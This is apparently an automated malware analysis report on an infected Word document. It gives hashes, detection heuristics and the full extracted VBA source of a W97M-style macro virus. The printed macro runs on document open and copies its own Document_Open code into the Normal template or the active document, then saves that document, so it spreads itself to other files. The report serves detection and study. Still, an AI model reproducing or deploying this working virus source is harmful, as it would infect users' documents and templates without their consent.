Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2661356c646ea7f2…

MALICIOUS

Office (OLE)

31.0 KB Created: 2009-08-31 09:44:00 Authoring application: Microsoft Office Word First seen: 2012-07-06
MD5: b87653125d7b85210b36d92823e1fb38 SHA-1: 0fd47dbc29cc57f12f2a2e8bc21b83b7c7af2184 SHA-256: 2661356c646ea7f21acd2fc3692ddb0fbb225764e3253f58a778760435294684
148 Risk Score

Heuristics 4

  • ClamAV: Doc.Dropper.Agent-1560882 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-1560882
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    Target.VBProject.VBComponents(1).CodeModule.DeleteLines TargetStart, TargetCount
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1963 bytes
SHA-256: 960d86d9af67ec76c581888ce0f25f6b7b563e9eaf9a8fdc1da5096d57cc8cca
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Wm97.KMaC by Lys Kovick

Private Sub Document_Open()
On Error Resume Next
Word.Application.Options.VirusProtection = True 
Word.Application.Options.SaveNormalPrompt = True 
Word.Application.Options.ConfirmConversions = True 
MyStart = ThisDocument.VBProject.VBComponents(1).CodeModule.ProcStartLine("Document_Open", vbext_pk_Proc)
MyCount = ThisDocument.VBProject.VBComponents(1).CodeModule.ProcCountLines("Document_Open", vbext_pk_Proc)
MyCode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(MyStart, MyCount)
If ThisDocument = NormalTemplate Then Set Target = ActiveDocument Else Set Target = NormalTemplate
For TargetLines = 1 To Target.VBProject.VBComponents(1).CodeModule.CountOfLines
If UCase(Target.VBProject.VBComponents(1).CodeModule.ProcOfLine(TargetLines, vbext_pk_Proc)) = "DOCUMENT_OPEN" Then Exist = True
Next
If Exist = True Then
TargetStart = Target.VBProject.VBComponents(1).CodeModule.ProcStartLine("Document_Open", vbext_pk_Proc)
TargetCount = Target.VBProject.VBComponents(1).CodeModule.ProcCountLines("Document_Open", vbext_pk_Proc)
TargetCode = Target.VBProject.VBComponents(1).CodeModule.Lines(TargetStart, TargetCount)
If TargetCode <> MyCode Then
Target.VBProject.VBComponents(1).CodeModule.DeleteLines TargetStart, TargetCount
Target.VBProject.VBComponents(1).CodeModule.InsertLines TargetStart, MyCode
ChangeCode = True
End If
Else
Target.VBProject.VBComponents(1).CodeModule.AddFromString MyCode
ChangeCode = True
End If
If Target = ActiveDocument And ChangeCode = True Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End If 'Kraft Macaroni and Cheese
End Sub